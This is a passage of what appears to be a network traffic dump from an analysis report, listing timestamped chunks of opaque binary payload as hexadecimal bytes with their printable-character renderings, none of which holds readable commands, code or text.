                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5934INData Raw: 70 aa 4a 60 a2 7f 87 c8 5a 76 b2 d4 5a d6 af 89 a0 48 df ae 43 a9 b9 c6 04 ba 03 8a 47 61 ee 72 32 14 30 2e 9e 98 f2 4d e7 a7 e5 32 e3 d8 c0 53 e2 f7 f7 2c 37 1e c9 67 e3 2c 75 8a dd f2 86 6b 4e 73 bc 23 9c 55 5d 31 71 2d 91 38 93 5a db 81 f3 9e 48 bc b5 41 a8 d3 38 f2 33 b2 7e 02 4d db c7 f3 07 8e a1 b4 9c 52 4d 1f 55 4d 7e 9d 64 89 b3 c0 e2 8e ef 5b 92 46 9c 63 2b 52 28 3c 1a ed 7f 9b ef b8 4c 67 87 68 e8 7a e6 06 e9 2e c5 1c fa 27 87 a5 92 a5 b1 14 15 91 97 ba db 4a d1 8a d8 53 07 90 28 e2 6f b5 77 6f 2f 75 9b 7f dc 20 5b 01 0c 99 96 42 f7 f0 d0 4f c6 ae fe e8 67 de c8 11 81 f2 0b fa ab 71 b6 5f 13 0b 17 7a 73 3e 2f be 2d 66 e9 2f cb 45 e4 f3 4f d0 c5 3c f3 24 71 85 f2 89 de 1a f0 14 3a 86 c1 0e a1 87 77 cc f1 a6 2e 8b b5 32 c7 c9 ce fb 24 39 eb 10 60
                                                                                                                                                                                                    Data Ascii: pJ`ZvZHCGar20.M2S,7g,ukNs#U]1q-8ZHA83~MRMUM~d[Fc+R(<Lghz.'JS(owo/u [BOgq_zs>/-f/EO<$q:w.2$9`
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5950INData Raw: 58 50 24 cb 93 01 26 6d 2c d1 b2 bc 0b 8a 37 be 6c 1d 0d cc 3e 55 48 71 36 49 9e 24 bd 11 21 a3 58 09 b4 e7 d3 d6 57 1e 40 a4 d7 08 2c 99 da c0 de ef 03 d3 66 60 7c 6a f2 57 f9 4c fe 77 82 94 78 c3 ba 6c 8c e0 02 19 cd 32 89 e1 af 56 43 7a da 4c 19 34 c2 98 ed 77 20 05 82 0b 9e 78 c7 9c 9c f5 a2 8e 19 c9 69 ec f8 95 de 57 62 70 e2 f7 42 29 07 a0 42 0a 7f ac 2f f8 a4 83 23 38 cc 0a 43 87 8f 27 48 37 e3 45 f4 2c 1e 3b 09 98 46 8a 55 5f ab 27 b1 2c 77 5b 44 bc 88 94 64 35 3d bb 68 74 c5 ef b8 45 b5 bc f1 29 55 f4 e3 48 e5 77 c0 a5 c9 ff f6 4b c7 c9 74 47 a9 47 73 31 af b3 9b 95 7f 5a d6 cd 90 ff de 2e 62 bb ad cd e1 51 97 1e 97 b9 5a 5b 8a 12 94 33 6f 05 57 d0 2a a7 4b f9 ef f2 3b d4 d5 60 38 08 f0 b9 80 ac 32 ed 7b 2d 20 42 0d d2 cf a1 b0 c9 0b 9a 26 2f d7
                                                                                                                                                                                                    Data Ascii: XP$&m,7l>UHq6I$!XW@,f`|jWLwxl2VCzL4w xiWbpB)B/#8C'H7E,;FU_',w[Dd5=htE)UHwKtGGs1Z.bQZ[3oW*K;`82{- B&/
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5966INData Raw: 71 c6 37 bd ab ad ba 72 26 48 36 0a 12 61 d8 fe 72 f6 92 1b 80 93 8b 9d 02 57 c9 ea 2a 31 90 ee 1a 0f 10 46 ac 12 5b 8e 7d 57 52 9d a4 d1 4d c6 a2 ff ba 8a 45 5a 82 e1 61 33 4b ab b9 f0 87 42 83 c5 7d a8 84 79 86 fd 45 2a c4 7c ac d8 c2 c3 f2 90 0f 12 a9 f7 d8 a4 a9 54 cc 23 4b 0b d5 02 d1 9e 3d 84 63 76 72 0f b8 3a 00 1c 73 16 56 a1 ff 0f 7d 71 db 57 c9 cd 89 9a 6b 6f 3b 10 bf a8 ac 4a 9e 3a 2e b0 83 60 0b 93 da 52 e4 9c 60 ff 21 44 15 fa 37 d4 c8 4a 36 29 53 d5 da aa 2e a0 02 67 ff 6a fa 0f fc f5 3e 03 66 bb 2f c8 0d 56 87 6b bc 7d 6e f4 bc e3 ae ab b6 7d c8 b3 ef 38 92 56 e7 b3 3f d7 fd 93 ec 3b bc 2d b6 a3 6b c1 c5 a7 57 75 8c 30 da 42 cf 96 34 e2 a3 f6 3c bf a8 a9 b7 27 67 d8 e9 72 64 51 b2 d2 37 d0 31 2c cb 2f a8 ac 6d ef 43 38 5e 24 44 0d 3e d5 e2
                                                                                                                                                                                                    Data Ascii: q7r&H6arW*1F[}WRMEZa3KB}yE*|T#K=cvr:sV}qWko;J:.`R`!D7J6)S.gj>f/Vk}n}8V?;-kWu0B4<'grdQ71,/mC8^$D>
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5982INData Raw: f0 55 08 60 41 76 77 ed 82 36 4f 65 32 54 06 77 6c ae 9a b7 e8 09 dd 82 2e 60 19 a2 f1 39 64 0e ee e4 ba d9 52 e8 cf 51 81 f5 4f c0 0b 1d 44 a0 28 f5 9a 3c ca 0c 3b 30 8d c2 d8 8e 59 10 29 2c f5 3a d6 90 e0 72 ad 4f f2 33 5f 73 9d 28 11 a2 fd 4c 03 31 d7 89 c2 9f 06 7f 21 9c 09 2d e4 88 74 7e 0e c4 03 9a ab ae 42 5d 9b 0c 98 58 4b 89 40 b4 a0 02 32 7d bf 6e 22 f0 0e a5 22 03 2b 28 33 49 cb 54 a6 09 63 79 8c b3 14 0b 95 17 2d 96 d0 27 9a e0 d9 24 b5 f2 5b 05 cd b1 3a c4 81 f3 47 cc d4 b8 c0 35 1c 3e a3 84 6c b5 ca 31 bf f6 bf 81 cb 35 19 9b 13 0c 99 06 a7 1b b6 b4 79 42 ca b2 11 c7 0a f4 f8 11 0b 13 d0 da b9 51 47 5c 33 05 9e 93 eb ce 16 33 fd 44 3e 9f 46 8f 70 27 0b 95 d3 6b 52 87 41 d9 a7 f2 55 11 18 ff 8c 41 60 5d 94 0e 51 03 a9 29 c9 51 76 2c 9e 8d 85
                                                                                                                                                                                                    Data Ascii: U`Avw6Oe2Twl.`9dRQOD(<;0Y),:rO3_s(L1!-t~B]XK@2}n""+(3ITcy-'$[:G5>l15yBQG\33D>Fp'kRAUA`]Q)Qv,
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5998INData Raw: 5a 7a 94 9c a0 39 ed 19 35 01 a1 3f 78 11 88 9a 0e 30 d2 99 21 19 88 e6 24 ca a9 89 08 b5 c6 43 87 4c e7 5d ee e5 ef 6a d9 ca 7a 30 62 90 df 43 15 ec 87 57 db 55 8d 0b 5e bb 80 f1 46 5e 5b 27 eb 12 f4 84 ab 0c a6 5e a4 4d 6b bf 10 b9 a8 65 66 6e f9 50 60 71 0f 3d 78 0d 33 9f 7c 2c 70 79 54 0e 8e 48 b4 80 69 d0 a5 ab 3d 84 70 20 57 26 fd 4e 3e a4 12 f0 9d 6e 28 31 1c 9c 7e 1e 84 c3 52 a4 b5 85 25 3e be f6 fc ff 25 d7 c1 19 cb 52 c0 dd f3 dc 5c 42 24 96 f3 95 58 d2 19 5b ca 1f 3f 7b 3c 78 91 05 36 97 d4 1b 29 cb 18 83 ea 70 18 e1 47 76 03 7d 58 30 55 f1 78 e0 75 61 5b 51 01 e4 c8 c2 60 ae 59 be 24 8f 9f 91 5c 22 ee 91 84 1f 7f 56 7b e0 33 e7 bd 6c 51 62 fb f1 93 da 7f 45 59 30 fc c6 22 39 61 5d 96 32 18 59 4e 42 33 d7 09 67 ea ad a7 16 f1 ca 01 57 ed 4a c0
                                                                                                                                                                                                    Data Ascii: Zz95?x0!$CL]jz0bCWU^F^['^MkefnP`q=x3|,pyTHi=p W&N>n(1~R%>%R\B$X[?{<x6)pGv}X0Uxua[Q`Y$\"V{3lQbEY0"9a]2YNB3gWJ
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6014INData Raw: 16 2e 27 67 aa 9c b9 1a 70 25 82 3e 0b 66 1a 04 22 6d 21 7a 65 d1 27 e2 54 5d c0 65 1f 1f 64 f8 f3 87 42 0c fe 54 38 53 c4 37 e6 86 28 c2 16 f0 f5 fd 32 22 d7 a4 27 c0 cb d3 ed 37 e1 75 94 41 a1 38 b0 70 2b ef 45 5a 35 51 12 2b ce 59 0c 0c b9 b4 9e 9d c3 70 99 19 85 6a 92 44 c1 1f cd 39 b6 d0 8e 79 e0 43 b7 80 2c 72 15 89 f4 f4 3d 1b ec cc 25 00 52 03 a2 3e 80 23 d0 a7 5a 15 8c 32 0e f7 97 5b b0 a4 ce d1 2f 05 02 00 1a bd 12 62 12 6d 1f ef 73 02 0b de 9d 33 02 83 cc 7d fc 77 6b 3f b9 4d ab 02 91 67 8f b5 cd 12 75 7e 95 36 35 4f 6d 93 76 c6 f1 d6 50 63 71 1a d3 e8 cc cb 89 13 ed df 61 63 cb fd e3 7c 4c a7 b7 36 49 ba a4 c1 32 f7 f3 e1 59 b9 1a 18 83 86 bf f7 cf 63 51 e3 cd c0 83 d1 ed 80 17 2b ac 6b 5b c4 0a 54 26 39 e1 32 c4 09 b6 1c 71 bc 4c aa 22 82 ad
                                                                                                                                                                                                    Data Ascii: .'gp%>f"m!ze'T]edBT8S7(2"'7uA8p+EZ5Q+YpjD9yC,r=%R>#Z2[/bms3}wk?Mgu~65OmvPcqac|L6I2YcQ+k[T&92qL"
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6030INData Raw: 59 5e 42 42 4a 04 43 1a ff 8b 4f b2 c7 25 e7 31 2a b1 5c 92 4e 36 bf 8d 97 ae 65 d9 5d ff 30 43 c6 0f d0 26 4e 22 9e 2d 40 a4 f0 90 02 1d 1a 9c 4e f8 10 f4 13 ef 74 12 30 42 eb 42 95 99 06 89 ac df 35 53 df 7b e6 dc a2 5a 1c 1a c0 09 71 e4 8f f7 7e 2d d5 72 8e c9 bf 68 d0 51 d6 1c 01 fc 71 00 5d b4 d1 90 e3 10 45 1d 89 c1 05 6d 15 c4 14 ad 28 42 9b e1 6f 5f 80 1a ce d6 95 50 a6 3b 92 89 88 7f 63 69 1c dc c1 53 a7 5a b4 30 84 64 0a 3c a9 5e 55 d4 4f 48 5f b3 04 b5 3d 85 00 2a 92 6e 92 26 90 cc d0 1f 08 e4 55 a2 ba 40 4c 08 7a b7 84 ab 77 25 ec cc 17 1d 04 7b b0 26 98 55 14 17 7e ee 06 10 04 9e f2 6c 63 23 41 90 48 bb f9 95 31 58 3b b1 81 c3 6e a5 61 41 ba 68 83 de 1a 4d 37 60 a6 15 77 19 87 28 95 5b 23 53 56 da 8f 5a 02 37 5f f7 56 96 62 58 41 5a 7f 22 18
                                                                                                                                                                                                    Data Ascii: Y^BBJCO%1*\N6e]0C&N"-@Nt0BB5S{Zq~-rhQq]Em(Bo_P;ciSZ0d<^UOH_=*n&U@Lzw%{&U~lc#AH1X;naAhM7`w([#SVZ7_VbXAZ"
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6046INData Raw: 79 98 5c 00 98 2d 20 16 ce d9 47 01 07 ff e7 81 32 14 07 af 29 33 d2 37 96 94 3f f7 c4 93 bb a3 1f 4d 66 73 49 2e 01 ba a1 90 55 01 08 1a 24 2c c0 4d 08 54 fb f6 bf 54 91 ae e6 39 d8 87 37 1c 34 da 3d 0f d7 bc 0c fb 31 10 65 9b 08 53 44 8a ed 9f ef e6 57 26 06 83 59 d8 2c 66 53 14 80 3d 06 3d 64 25 d7 0c 1b 47 dd 78 7a 5d 2f 4a 5b bd 6d 53 cf e8 6d 0c f1 ce 3a 2a be 68 5b 18 1c 37 f4 e3 8e f7 46 eb 60 1b 2e e5 fe 27 d7 d3 e1 12 b9 0f 93 e4 20 d5 2f 7e 71 c2 b5 9c 74 d4 6b 88 1d 72 2c 10 67 df 06 fa ad 16 fa 64 a6 4f 5c 8d 82 2e 73 c4 8f b5 1a 6a 28 73 ca c5 2d 2d 72 03 4e 08 54 66 51 eb 83 27 06 2f 8e 24 b9 f9 d8 46 4e 8d e0 f5 34 dd 9a 21 48 8d 78 9b 17 58 3c 0f c4 3a cb 7d be e2 cb d7 df 80 0f 39 d3 a7 2d 7c 2f 71 71 cc 07 1e e9 f7 9b d2 f9 91 42 fc a4
                                                                                                                                                                                                    Data Ascii: y\- G2)37?MfsI.U$,MTT974=1eSDW&Y,fS==d%Gxz]/J[mSm:*h[7F`.' /~qtkr,gdO\.sj(s--rNTfQ'/$FN4!HxX<:}9-|/qqB
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6062INData Raw: 26 c3 0a c2 7e d0 17 93 3e d3 19 87 ea b9 ea 33 78 c0 72 8b 34 6d ac c6 fd 54 fc 43 6c d7 de 21 bb 22 79 24 c9 2b 6d d2 57 a8 a5 d8 61 61 c8 42 c7 c8 46 c8 1d 80 94 25 18 94 d0 76 04 ef 0b 12 8b 9d df 1e 00 34 8a e4 e7 ec 2a ee f0 14 f7 cc dc 11 a0 74 fa 69 4d 8e 3c c9 d2 f2 eb 8e 56 fb 7c 18 66 66 a8 15 93 b1 b4 ce b8 d2 b4 e0 b3 97 28 87 08 d4 2b 4b d1 e4 b9 62 e5 2c 1e 80 59 db 63 50 22 42 15 34 c4 d9 a3 8a 3a 43 d8 71 3a 18 97 b3 0e 61 6e 25 00 5c dc e4 2e 20 d0 50 10 0b f2 b5 3f 28 15 8f 05 64 94 f9 37 f4 3b 2a d6 3e 5e 67 2a 64 1f e2 79 64 1f f6 27 c1 22 d5 41 6d cd 93 2c 88 a7 c4 f3 1f 7d 30 94 a7 0d 37 19 64 68 51 96 b3 25 28 9e 20 2f 35 eb f8 89 f9 d3 ad 24 9c 89 dd 20 c1 54 04 ce 81 47 71 48 41 8e 85 63 5d 7e d8 19 7b 46 3f 1f 08 ee ec 8f 3a de
                                                                                                                                                                                                    Data Ascii: &~>3xr4mTCl!"y$+mWaaBF%v4*tiM<V|ff(+Kb,YcP"B4:Cq:an%\. P?(d7;*>^g*dyd'"Am,}07dhQ%( /5$ TGqHAc]~{F?:
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6078INData Raw: df 2c 31 3b 5b 8e ef 66 dd 43 f0 7e 91 ce 9b 80 8f a6 62 29 fe 34 59 9a 48 86 98 8e ba 9b cd 90 7d 79 24 58 72 c1 19 6c 17 aa 86 c2 e5 da 9b 6f f1 c9 08 ef 64 84 cc 27 41 9e d1 20 02 ae fe b3 51 6c 1a e1 1e 61 fb 4a c8 91 f3 b8 09 dd 8d b2 e9 58 b9 9c af ba 12 a9 61 93 6e 3a a1 67 92 cf d0 c2 f1 63 53 a6 28 6a 2b 09 f2 6a dd 43 eb a2 b3 0c 7d 49 29 c3 46 d7 a3 cf 76 ca 54 07 97 96 6c 43 9c bf a3 42 cb 8f 35 39 45 e8 17 6d 83 71 d3 fd 3b 8b ce d9 64 fb b5 ea 3c fe e3 2e 8a d1 47 16 0c f7 62 a8 75 66 29 f7 7f f9 4f d1 ad 72 2d 46 b9 b0 cf 17 37 c0 14 9a 73 1d a3 76 57 0a c6 6e 41 95 8c e5 28 6d d4 81 b9 32 21 56 2c ba 67 c4 b9 86 8f ac 61 3c 48 19 3d a3 0f 17 fb ba 33 5f d3 10 22 4a 94 5d e9 4c 45 a0 8b 04 77 fe ba d9 0d 11 45 57 94 f4 0c 3f 87 44 2e 90 07
                                                                                                                                                                                                    Data Ascii: ,1;[fC~b)4YH}y$Xrlod'A QlaJXan:gcS(j+jC}I)FvTlCB59Emq;d<.Gbuf)Or-F7svWnA(m2!V,ga<H=3_"J]LEwEW?D.
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6094INData Raw: 38 ea a9 7c 66 40 25 c0 ca f0 89 ee c7 2e 1c f7 21 d2 68 80 aa 49 44 06 e7 df 1d 80 37 a4 b0 76 1b fc 1d de 55 99 00 d7 49 fa 8a 2c 8c 51 fa 10 f4 98 1a 33 1a c2 5f ad 14 e9 b8 32 64 7a d9 5a 9e 57 4e ea ff 90 04 86 cf 69 58 b5 ac df c8 f0 e3 0e 73 8e 1f 4c 8f 88 b0 71 b8 a5 4b 2b 3e 3b b1 9d e2 9e 06 4c 7f 65 48 a9 73 1b d9 67 54 93 f8 1f 0e 76 02 7d b5 7d 53 51 70 ed bc f7 97 83 55 b3 c3 35 ba 37 21 05 74 58 ef 0e 29 94 e5 25 ac a6 e9 1e c7 51 a7 b2 67 35 40 e6 39 12 8f 97 42 89 67 a3 4c 53 f5 d4 08 cb 8e 1a a0 5a ca db ca 9a 28 a5 89 41 4c f8 3e 58 7d b9 6e 7d 4a 2a c8 95 fc f6 d9 d4 b7 c9 a5 67 d2 e1 40 d7 21 b3 b7 30 e8 0f 27 d6 a1 46 3c 74 eb b7 5a 3b 10 e1 54 e9 77 a6 d9 ea 04 08 92 d4 eb 54 da 7f d1 c1 82 8b 52 05 66 0b c6 f3 3c d0 96 ac 40 69 2d
                                                                                                                                                                                                    Data Ascii: 8|f@%.!hID7vUI,Q3_2dzZWNiXsLqK+>;LeHsgTv}}SQpU57!tX)%Qg5@9BgLSZ(AL>X}n}J*g@!0'F<tZ;TwTRf<@i-
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6110INData Raw: f1 7c 11 2b b0 79 0c 5b c1 01 68 4a 1a e2 46 ac 8e 90 b9 d7 87 ec cc 31 3e 99 62 4f 88 bb 00 17 53 77 1a 8f a4 9c a1 b6 c2 51 bb dc 75 59 66 0b 50 2b 4a e0 ff e3 ee b1 36 11 4e 83 51 be 01 b2 27 67 bf db 7b 5a c1 f4 90 e9 13 f4 bd 02 92 56 58 c5 93 c1 2f 8c fb 3b 58 a2 f0 f0 c4 67 6d ef 2e ed a1 e7 58 7f 67 2f 21 c5 90 4a de 94 b6 a4 12 aa 65 18 f2 56 cf b1 46 15 51 93 0a 8d 3b 37 89 d1 75 da b1 37 29 48 54 55 da 09 07 ce cd d7 3a a1 d6 fa 88 bc dd 83 98 c4 ec 04 d6 aa eb 72 e7 1a 8e 4b d2 85 13 e1 a9 f8 83 c0 a5 8c 6f e1 c7 be 07 e5 a3 43 0f 1a 92 36 68 db c5 af c1 cd 32 02 91 3f aa 5b 9c 5b 90 c0 62 41 74 a0 a2 03 d1 e5 94 ea 41 55 b5 d2 56 16 dd ed 42 31 46 3b e6 e7 6b c1 c7 89 06 ae 3c b4 e6 c8 17 92 95 89 16 07 e7 f2 68 4a 32 3e 47 8e 4b e1 a1 0d c9
                                                                                                                                                                                                    Data Ascii: |+y[hJF1>bOSwQuYfP+J6NQ'g{ZVX/;Xgm.Xg/!JeVFQ;7u7)HTU:rKoC6h2?[[bAtAUVB1F;k<hJ2>GK
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6126INData Raw: db 75 1e b1 0f d0 77 eb a9 bb cb ad 8d da 19 32 77 8a a3 17 d9 dc 14 9c 48 17 80 5a 89 9e f1 5e 68 cb 6d bb 89 9f c8 f9 95 3c 30 71 3d 3e 32 bc 71 5d 9b e5 82 28 13 6a 5f 9a 65 d2 da bc 13 1b 4e 2e 9f 1e 5d e7 a9 d5 d3 4d 51 93 f2 4d 3a 32 14 4e 48 4d f6 d8 7e 76 b8 b1 6f 15 2e e2 55 96 e5 61 bb 7f b9 b1 01 00 c3 a1 f0 12 99 b2 cf 48 c2 d3 d3 56 77 94 16 c3 31 fc 46 81 c4 60 54 4c dc 35 e7 66 38 25 f1 9b bb 9f ab 1b 83 4b 2a 10 db cc ba e8 06 d1 aa 09 12 04 7c 34 b5 8a f9 5b 38 8a 30 c1 d3 33 8e 92 a0 c8 02 f6 12 5e 01 b2 93 b4 dc ce 4d ef 48 92 63 91 18 39 a8 b7 e6 a9 fc 11 9e e0 01 2a e8 03 32 8e dd 87 06 db 2a da 33 87 6c 83 bf c2 21 6c ba 08 22 77 eb c7 c2 81 a7 0a 73 36 cc 22 ca ed d1 7b e6 22 2b 09 a1 46 db 22 59 29 03 6a 13 18 fe 3e e8 ed c4 5d 73
                                                                                                                                                                                                    Data Ascii: uw2wHZ^hm<0q=>2q](j_eN.]MQM:2NHM~vo.UaHVw1F`TL5f8%K*|4[803^MHc9*2*3l!l"ws6"{"+F"Y)j>]s
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6142INData Raw: 41 60 cc df 98 e3 60 66 da 17 5c 59 40 f3 a7 56 dc b6 1b ef a8 5a 97 09 4c ed ab db 5e 4f 2d 70 78 75 16 63 2f 08 ce 13 f7 58 73 a2 6d 5d d0 eb a8 ea c8 f9 68 d7 ec 5e 66 05 ba 45 5a 74 f1 9c 93 1c 0f e8 1f 19 a9 b0 44 0f 64 ee e6 34 c7 91 1c 9d 98 b0 31 ea 02 24 9d f4 7b ce d4 d6 b0 61 58 e5 2e 05 36 63 c0 1b 32 42 1c bc f2 a3 a7 ba 62 0b 47 81 0d 7a 99 da 1e ca ad 36 ff a4 fc 29 24 18 4a 2d 5d 8d d5 90 d3 4f b0 05 27 bb be d6 41 64 86 f4 64 9c 7f 18 cb ec e8 4e 2a 83 13 9e 55 6d 24 bb b1 dc 5b a9 66 8d 5f 29 0f 58 47 78 4c 43 72 c2 ad 3e 3a 17 75 c6 75 2f 75 9f 24 31 be 6d e5 cf 3e a2 c6 50 e8 15 fc 04 96 bf 10 0b b4 9f 82 1b 69 9a 9c b8 d1 b9 0e 39 26 5e ed 67 d4 0e 57 5f b7 14 19 53 52 0a 93 87 84 dd ac a5 04 d3 d8 48 24 47 33 53 7e 34 f2 ab 94 ef df
                                                                                                                                                                                                    Data Ascii: A``f\Y@VZL^O-pxuc/Xsm]h^fEZtDd41${aX.6c2BbGz6)$J-]O'AddN*Um$[f_)XGxLCr>:uu/u$1m>Pi9&^gW_SRH$G3S~4
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6158INData Raw: 0f 16 5b 44 e3 7a 82 3c 86 0a 2a 92 1f 3d bd 9f bb ec 7d c4 3b 47 24 9c 07 2a bf 00 2a b2 97 b4 04 c5 f9 d3 95 ed df 76 8e fe 95 9e 20 4c 3c 90 c1 47 7f f2 ac e2 7a cb 0b 06 50 4b 35 1c a2 1a ea 4e c9 b7 a7 10 03 3c 51 09 f4 01 2c 95 56 bd b2 be be 30 5c eb b0 3e 85 58 12 94 5a 05 38 fa 0c 4b 03 6a e8 24 a2 ee f6 8d 72 05 08 40 74 05 f7 96 90 4b 93 08 65 2a 00 35 8f 5c 09 9c d6 44 40 2c 09 99 c0 0b b5 13 65 97 58 ff 5b e8 b5 1c bd 3a c4 6e e2 1d a1 b3 3e 33 a2 9d 8b 3b 0c 31 2d 63 a8 d3 a9 c4 7a ad 5c 8e f2 f4 1a 6a 41 16 3d 21 87 3a 81 25 56 02 df 58 36 ba 5f b9 84 75 b5 c9 cc 92 a7 03 7e aa 4e 8e ea c7 3d 25 bb a6 b8 d4 96 4f 78 11 2f 80 8a 98 12 fc f9 7e d5 4e eb aa 70 69 19 eb c7 05 c0 c9 4c f4 47 90 0e 66 34 3c a9 d5 aa 35 ea 4f c7 20 f5 83 94 c4 df
                                                                                                                                                                                                    Data Ascii: [Dz<*=};G$**v L<GzPK5N<Q,V0\>XZ8Kj$r@tKe*5\D@,eX[:n>3;1-cz\jA=!:%VX6_u~N=%Ox/~NpiLGf4<5O
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6174INData Raw: ef 85 43 ed 8b 2b a7 53 64 7f 1b 25 3f 41 59 d2 a7 17 e5 f0 dc 12 3e 31 bf b8 ca c4 7e e7 c5 56 37 ec 4f c4 a2 57 ee 43 13 55 ca 6c d9 b5 37 d0 ad c2 53 42 9a e6 1b f2 88 78 a5 41 84 52 6c 87 17 d8 48 f5 f6 48 e2 79 27 42 d7 9f 26 e1 c1 41 66 1b 59 d6 3c 3a 8e bc dc fa 2f 1f e3 ff 01 cd 26 2b a8 f1 a9 82 14 8d 96 f1 cc b7 65 d1 c9 d5 4e 1a d8 85 74 13 ef 04 cf 29 ec 56 4e e2 12 ff 5c 3a 55 f3 5b d0 cb d3 d3 d3 66 8b b7 24 48 8f d1 c2 47 c3 2b f1 77 20 10 26 76 55 09 da 7a 9f 65 d3 fd 00 5d 63 6e 75 23 ea f8 13 fc ef 68 e8 54 01 54 8f f2 73 06 11 f2 6d 48 2d 3b d9 9a f5 bb f0 17 cf 26 2f 09 a2 02 54 2e 57 cf e9 34 9e 2e 0d dd de 92 dd 3e 93 6f 52 38 50 b8 37 22 f2 6a 51 f9 7f 12 a5 6e e6 09 2e 69 47 7a 18 65 f5 1c fc ef 96 4d 21 1e 8e 2d 58 86 b5 5f 25 2b
                                                                                                                                                                                                    Data Ascii: C+Sd%?AY>1~V7OWCUl7SBxARlHHy'B&AfY<:/&+eNt)VN\:U[f$HG+w &vUze]cnu#hTTsmH-;&/T.W4.>oR8P7"jQn.iGzeM!-X_%+
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6190INData Raw: e1 01 0a 52 77 fd 5e f4 eb a2 7d db e7 33 aa 5f b7 c7 0a cc eb 15 a3 91 ab 33 28 d5 36 30 7a ae 43 cd 10 c3 b3 c2 d7 4b 82 11 8c ad 12 fb 7a 82 13 9b 24 15 c2 24 2d e2 e4 18 7d 31 90 fc 2f 9f 8c 7d 4b a6 6c d8 a1 e8 44 d2 66 29 02 76 19 d3 60 22 13 71 ca b9 8e ea cd b3 ef 91 4f 22 e5 44 11 42 90 7f 27 74 68 ad a6 bd 1b 26 c4 3f 46 74 f3 6f ec 4c 26 bf 7c f6 7c 66 e1 0a 4e 6d 90 c2 bb 6f 58 28 08 3a d4 81 7d a3 ed 3c 38 26 e4 a6 99 3b c6 b7 ad 92 db 6d 37 7f a5 56 aa 44 90 6a e2 f5 ef 55 ea 22 1a 21 7a b0 c0 7a 67 1d 53 73 59 c4 5e 7d 77 dd ef f7 55 c4 67 bb 88 fc 31 b8 90 0e f4 06 32 0b 8b 37 b0 54 5d 9d ee ce 8d 61 61 58 54 7b 9d eb 4f 62 fb bc ba 08 76 65 c6 da 0f 25 e4 cb c0 8b 9c b6 26 97 22 89 e8 24 65 dc 92 eb c7 1f f3 7b 87 b4 63 27 61 45 d2 a0 64
                                                                                                                                                                                                    Data Ascii: Rw^}3_3(60zCKz$$-}1/}KlDf)v`"qO"DB'th&?FtoL&||fNmoX(:}<8&;m7VDjU"!zzgSsY^}wUg127T]aaXT{Obve%&"$e{c'aEd
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6206INData Raw: e9 82 04 f4 03 76 84 ef b4 56 51 c1 24 02 85 36 ac 8b 00 f2 59 1d 46 d8 2f 4b 0b f3 70 95 84 ef fa 7d 67 fe 1a 56 74 09 f3 18 b5 60 eb 50 58 50 b4 50 42 17 d3 8d 4b 5c f6 af 38 eb 8d b7 e2 06 67 1e 17 7b 06 35 60 64 55 ec ae f0 8e b8 45 03 ae 12 77 13 96 a9 23 25 d0 c7 00 8a 62 ca 79 57 d2 13 70 77 b9 1c 5f 94 35 a0 ed 8a 73 58 63 73 02 14 6c f2 85 77 21 00 2a 17 33 4c eb 26 be a2 0c 4b 93 64 0e f2 92 47 5f 8c 10 a7 cd 4f c2 84 bb ff 7b e1 63 36 45 9e 7d 96 51 06 3d 96 66 81 d6 1e d6 24 45 d8 d3 ce bc 04 80 46 68 af 8c cd 34 49 30 77 a5 8e b6 20 a2 71 eb f6 75 e7 c6 9a 37 eb 7a e7 2e 02 e0 b0 38 68 08 ef e4 ae c7 a4 7d f8 f6 c6 7d 19 da ff a8 a9 4d 77 1c 0e ef d6 14 e6 4b ea 28 c8 f6 f2 09 c9 f3 76 f2 e6 15 a0 50 f7 a9 c2 92 1b fa 6a 7d 58 c7 a1 35 cc 64
                                                                                                                                                                                                    Data Ascii: vVQ$6YF/Kp}gVt`PXPPBK\8g{5`dUEw#%byWpw_5sXcslw!*3L&KdG_O{c6E}Q=f$EFh4I0w qu7z.8h}}MwK(vPj}X5d
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6222INData Raw: 28 ce ca d7 8d 0d d0 2d 49 e3 11 c0 21 09 1f 80 e3 c8 00 76 a1 2e 19 8c 9d d7 13 34 ce c7 2a b0 c8 62 ca fb d9 47 2c d0 23 84 72 e7 ff ff 8e 58 b2 7e d7 a9 9b 93 f7 31 bc 8f 17 d4 fc 45 e2 09 07 92 4c 6b e7 4f 42 f7 30 83 71 d3 97 86 8f a7 4f 15 d7 58 18 81 af 50 9d c2 9f 8d 2c 5f b7 80 86 7e 88 ca d2 d6 2d fa 6e 1d 67 98 35 e0 8e 68 ca 17 c3 2c 41 93 e0 a0 d7 3a b8 91 a3 f1 d0 93 08 88 8d e9 25 9b 29 1a 59 c6 dd f5 0c b9 c8 0e 87 a4 f9 c3 b1 9f 5a 7e 80 80 69 cd fe 3b 0f 7e 56 be 31 fb 96 d3 92 f7 fd 4d 17 35 9f 0c e4 8e ab 95 4b a1 5f 7c 9a 73 a9 16 44 b4 6f 78 1b 7e bd 7d 9b 80 37 6e 0e 85 b1 84 74 31 36 1a bd 39 95 42 e1 d1 5c fb 78 ed 6e 7e 84 f4 ba f6 11 6f 1b 13 e7 c3 bd c5 cc 4b dd 0f 11 b1 71 d5 51 11 4c 70 8b 26 f2 af 56 26 f1 7d 77 cc fc dc 17
                                                                                                                                                                                                    Data Ascii: (-I!v.4*bG,#rX~1ELkOB0qOXP,_~-ng5h,A:%)YZ~i;~V1M5K_|sDox~}7nt169B\xn~oKqQLp&V&}w
